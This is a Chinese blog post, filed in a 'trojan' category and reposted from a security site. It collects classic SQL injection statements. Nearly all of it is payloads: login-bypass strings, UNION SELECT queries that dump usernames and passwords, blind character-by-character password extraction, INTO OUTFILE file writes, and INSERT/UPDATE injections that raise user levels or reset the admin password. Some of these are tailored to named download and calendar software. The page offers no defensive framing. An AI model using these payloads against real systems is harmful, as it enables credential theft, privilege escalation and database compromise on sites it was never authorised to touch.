经典的注入语句归总

最新推荐文章于 2022-09-20 17:29:00 发布
最新推荐文章于 2022-09-20 17:29:00 发布
阅读量587 收藏
点赞数
分类专栏: 木马 文章标签: user table login calendar insert email

注入经典语句总结 ' or 1=1 ' or '1=1 '/* '%23 ' and password='mypass id=-1 union select 1,1,1 id=-1 union select char(97),char(97),char(97) id=1 union select 1,1,1 from members id=1 union select 1,1,1 from admin id=1 union select 1,1,1 from user userid=1 and password=mypass userid=1 and mid(password,3,1)=char(112) userid=1 and mid(password,4,1)=char(97) and ord(mid(password,3,1))>111 (ord函数很好用,可以返回整形的) ' and LENGTH(password)='6(探测密码长度) ' and LEFT(password,1)='m ' and LEFT(password,2)='my …………………………依次类推 ' union select 1,username,password from user/* ' union select 1,username,password from user/* =' union select 1,username,password from user/* (可以是1或者=后直接跟) 99999' union select 1,username,password from user/* ' into outfile 'c:/file.txt (导出文件) =' or 1=1 into outfile 'c:/file.txt 1' union select 1,username,password from user into outfile 'c:/user.txt SELECT password FROM admins WHERE login='John' INTO DUMPFILE '/path/to/site/file.txt' id=' union select 1,username,password from user into outfile id=-1 union select 1,database(),version() (灵活应用查询) 常用查询测试语句, SELECT * FROM table WHERE 1=1 SELECT * FROM table WHERE 'uuu'='uuu' SELECT * FROM table WHERE 1<>2 SELECT * FROM table WHERE 3>2 SELECT * FROM table WHERE 2<3 SELECT * FROM table WHERE 1 SELECT * FROM table WHERE 1+1 SELECT * FROM table WHERE 1--1 SELECT * FROM table WHERE ISNULL(NULL) SELECT * FROM table WHERE ISNULL(COT(0)) SELECT * FROM table WHERE 1 IS NOT NULL SELECT * FROM table WHERE NULL IS NULL SELECT * FROM table WHERE 2 BETWEEN 1 AND 3 SELECT * FROM table WHERE 'b' BETWEEN 'a' AND 'c' SELECT * FROM table WHERE 2 IN (0,1,2) SELECT * FROM table WHERE CASE WHEN 1>0 THEN 1 END 例如:夜猫下载系统1.0版本 id=1 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 id=10000 union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and groupid=1 union select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 (替换,寻找密码) union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,1,1))=49 (验证第一位密码) union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,2,1))=50 (第二位) union select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from ymdown_user where id=1 and ord(mid(password,3,1))=51 ………………………………………………………… 例如2:灰色轨迹 变换id进行测试(meteor) union%20(SELECT%20allowsmilies,public,userid,'0000-0-0',user(),version()%20FROM%20calendar_events%20WHERE%20eventid%20=%2013)%20order%20by%20eventdate union%20(SELECT%20allowsmilies,public,userid,'0000-0-0',pass(),version()%20FROM%20calendar_events%20WHERE%20eventid%20=%2010)%20order%20by%20eventdate 构造语句: SELECT allowsmilies,public,userid,eventdate,event,subject FROM calendar_events WHERE eventid = 1 union (select 1,1,1,1,1,1,1 from user where userid=1) SELECT allowsmilies,public,userid,eventdate,event,subject FROM calendar_events WHERE eventid = 1 union (select 1,1,1,1,username,password from user where userid=1) UNION%20(SELECT%201,0,2,'1999-01-01','a',password%20FROM%20user%20WHERE%20userid%20=%205)%20order%20by%20eventdate UNION%20(SELECT%201,0,12695,'1999-01-01','a',password%20FROM%20user%20WHERE%20userid=13465)%20order%20by%20eventdate UNION%20(SELECT%201,0,12695,'1999-01-01','a',userid%20FROM%20user%20WHERE%20username='sandflee')%20order%20by%20eventdate (查沙子的id) (SELECT a FROM table_name WHERE a=10 AND B=1 ORDER BY a LIMIT 10) SELECT * FROM article WHERE articleid='$id' UNION SELECT * FROM……(字段和数据库相同情况下,可直接提交) SELECT * FROM article WHERE articleid='$id' UNION SELECT 1,1,1,1,1,1,1 FROM……(不同的情况下) 特殊技巧:在表单,搜索引擎等地方写: “___” “.__ ” “% %' ORDER BY articleid/* %' ORDER BY articleid# __' ORDER BY articleid/* __' ORDER BY articleid# $command = "dir c:";system($command); SELECT * FROM article WHERE articleid='$id' SELECT * FROM article WHERE articleid=$id 1' and 1=2 union select * from user where userid=1/* 句中变为 (SELECT * FROM article WHERE articleid='1' and 1=2 union select * from user where userid=1/*') 1 and 1=2 union select * from user where userid=1 语句形式:建立一个库,插入: CREATE DATABASE `injection` CREATE TABLE `user` ( `userid` int(11) NOT NULL auto_increment, `username` varchar(20) NOT NULL default '', `password` varchar(20) NOT NULL default '', PRIMARY KEY (`userid`) ) ; INSERT INTO `user` VALUES (1, 'swap', 'mypass'); 插如一个注册用户: INSERT INTO `user` (userid, username, password, homepage, userlevel) VALUES ('', '$username', '$password', '$homepage', '1'); “INSERT INTO membres (login,password,nom,email,userlevel) VALUES ('$login','$pass','$nom','$email','1')"; INSERT INTO membres (login,password,nom,email,userlevel) VALUES ('','','','','3')#','1') "INSERT INTO membres SET login='$login',password='$pass',nom='$nom',email='$email'"; INSERT INTO membres SET login='',password='',nom='',userlevel='3',email='' "INSERT INTO membres VALUES ('$id','$login','$pass','$nom','$email','1')"; UPDATE user SET password='$password', homepage='$homepage' WHERE id='$id' UPDATE user SET password='MD5(mypass)' WHERE username='admin'#)', homepage='$homepage' WHERE id='$id' "UPDATE membres SET password='$pass',nom='$nom',email='$email' WHERE id='$id'"; UPDATE membres SET password='[PASS]',nom='',userlevel='3',email=' ' WHERE id='[ID]' "UPDATE news SET Votes=Votes+1, score=score+$note WHERE idnews='$id'"; 长用函数: DATABASE() USER() SYSTEM_USER() SESSION_USER() CURRENT_USER() 比如: UPDATE article SET title=$title WHERE articleid=1 对应函数 UPDATE article SET title=DATABASE() WHERE id=1 #把当前数据库名更新到title字段 UPDATE article SET title=USER() WHERE id=1 #把当前 MySQL 用户名更新到title字段 UPDATE article SET title=SYSTEM_USER() WHERE id=1 #把当前 MySQL 用户名更新到title字段 UPDATE article SET title=SESSION_USER() WHERE id=1 #把当前 MySQL 用户名更新到title字段 UPDATE article SET title=CURRENT_USER() WHERE id=1 #把当前会话被验证匹配的用户名更新到title字段 ::::::::::::::::::::::::::::::: $req = "SELECT * FROM membres WHERE name LIKE '%$search%' ORDER BY name"; SELECT * FROM membres WHERE name LIKE '%%' ORDER BY uid#%' ORDER BY name SELECT * FROM membres WHERE name LIKE '%%' ORDER BY uid#%' ORDER BY name SELECT uid FROM admins WHERE login='' OR 'a'='a' AND password='' OR 'a'='a' (经典) SELECT uid FROM admins WHERE login='' OR admin_level=1#' AND password='' SELECT * FROM table WHERE msg LIKE '%hop' SELECT uid FROM membres WHERE login='Bob' AND password LIKE 'a%'#' AND password='' SELECT * FROM membres WHERE name LIKE '%%' ORDER BY uid#%' ORDER BY name 本篇文章来源于 安防快线 (www.sec520.com) 原文出处:http://www.juntuan.net/Article/2009/200906/3544.html

hack8
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
计算机自测题归总.docx
04-21
计算机自测题归总.docx
SQL Injection with MySQL
11-11 1418
本文作者:angel文章性质:原创发布日期:2004-09-16本文已经发表在《黑客防线》7月刊,转载请注明。由于写了很久,随着技术的进步,本人也发现该文里有不少错误和罗嗦的地方。请各位高手看了不要笑。本文写于《Advanced SQL Injection with MySQL》之前一个月。声明  本文仅用于教学目的,如果因为本文造成的攻击后果本人概不负责,本文所有
注入的几条简单语句,不用像网上那样复杂
得峰的专栏 [网络收藏]
05-04 719
一、版本url/1.asp?id=1 and @@VERSION>0二、跨库url/1.asp?id=1 and 1=(select db_name(n))n改成0,1,2,3……就可以跨库了,是不是比网上的简单呢?三、列名url/1.asp?id=1 and 1=(select col_name(object_id(表名),n) 表名可以换成16进制。像bbsuser=0x6200620
常见注入语句
aipei5098的博客
04-26 78
#常规注入 ' --+ ' --%20 ' # ' %23 ' and 1=1 --+ ' and 1=2 --+ ' and 1=2 union select * from admin --+ ' and 1=2 union select * from user --+ ' and 1=2 union select * from users --+ #爆字段长度...
常用的一些注入命令
wing 的专栏
01-13 681
我记性不好,所以把常用的注入代码记录下来,有点乱,但对我来说,还算很有用,希望大家也会喜欢! //看看是什么权限的 and 1=(Select IS_MEMBER('db_owner')) And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;-- //检测是否有读取某数据库的权限 and
SQL注入语句和方法总结
叮当大猫猫
09-29 6492
一、SQL语法基础 SQL语法基础和Oracle注入技巧 https://pan.baidu.com/s/11EOTJ8nHrHqimF8nJJTDvA 提取码:4zep 二、SQL手工注入语句 1.判断是否有注入 ;and 1=1 ;and 1=2 2.初步判断是否是mssql ;and user>0 3.判断数据库系统 ;and (select count() from sysobjects)>0 mssql ;and (select count() from msysobjects)&gt
SpringBoot 集成Redis 知识归总
WLF4188的博客
09-15 109
SpringBoot 集成Redis关于Redis缓存项目结构![在这里插入图片描述](https://img-blog.csdnimg.cn/20200915100408788.PNG?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1dMRjQxODg=,size_16,color_FFFFFF,t_70#pic_center)项目开发 关于Redis缓存
1024程序员节,一份精华合辑送给你
wujiandao的专栏
10-24 1488
点击蓝色“有关SQL”关注我哟加个“星标”,天天与10000人一起快乐成长写在前面今天,10月24日。对于程序员来说,这天意义非凡。我的公众号,提供了一份1024的礼物,相信每个关注的朋友...
【网络安全面经】2023届网络安全岗秋招面试题及面试经验分享
admin_man的博客
09-20 5334
内容来自于社群内2023届毕业生在毕业前持续整理、收集的安全岗面试题及面试经验分享~
计算机自测题归总.doc
04-21
计算机自测题归总.doc
WinDBG命令归总
04-11
WinDBG命令归总
SQL实战代码基础归总
04-11
sql全部基础完全手写代码大全,对于初学者是很有帮助的
IOS面试题归总
07-07
IOS面试题归总 Object-C有多继承吗?没有的话用什么代替 Object-C有私有方法吗?私有变量呢 关键字const什么含义 关键字volatile有什么含义?并给出三个不同例子? static作用 #import和#include的区别,@class代表...
Java毕业设计-基于SSM框架的大学生社团管理系统带lw(源码+演示视频+说明).rar
05-09
Java毕业设计-基于SSM框架的大学生社团管理系统带lw(源码+演示视频+说明).rar 【项目技术】 开发语言:Java 框架:ssm+vue 架构:B/S 数据库:mysql 【演示视频-编号:438】 https://pan.quark.cn/s/b3a97032fae7 【实现功能】 实现了社长管理,社团信息管理,社团分类管理,社团加入信息管理,社团成员登记管理,活动信息管理等功能。
基于javaEE+Mysql实现的超市积分管理系统(源码+数据库sql+论文+视频齐全)
05-09
【作品名称】:基于javaEE+Mysql实现的超市积分管理系统(源码+数据库sql+论文+视频齐全) 【适用人群】:适用于希望学习不同技术领域的小白或进阶学习者。可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。 【项目介绍】: 超市会员积分管理系统主要用于实现了企业管理数据统计等。本系统结构如下: (1)网络会员管理中心界面: 会员修改密码信息模块:实现会员密码功能; 会员登陆模块:实现会员登陆功能; 会员注册模块:实现会员注册功能; 留言板模块:实现留言板留言功能 (2)后台管理界面: 系统用户管理模块:实现管理员的增加、查看功能; 会员信息管理模块:实现会员信息的增加、修改、查看功能; 注册用户管理模块:实现注册用户的增加、修改、查看功能; 会员卡管理模块:实现会员卡信息的增加、查看功能; 商品销售管理模块:实现商品信息的增加、查看功能; 会员积分管理模块:实现合作公司信息的增加、查看功能; 信息统计模块:实现数据统计报表功能; 留言板模块:实现留言板信息的增加、修改、查看功能;
node-v6.9.4-linux-s390x.tar.xz
05-09
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
node-v6.13.1-linux-ppc64.tar.xz
最新发布
05-09
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
learn.py
05-09
learn.py
帮我写一段sql代码,现在有个数据表有两个金额,两个日期,一个编号,一个姓名,现在我要把对应每一个编号的金额归总提取出来
05-27
假设数据表名为 `table_name`,其中包含的字段为 `amount1`、`amount2`、`date1`、`date2`、`id`、`name`,可以使用如下 SQL 代码实现对应每一个编号的金额归总提取: ```sql SELECT id, SUM(amount1) + SUM(amount...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值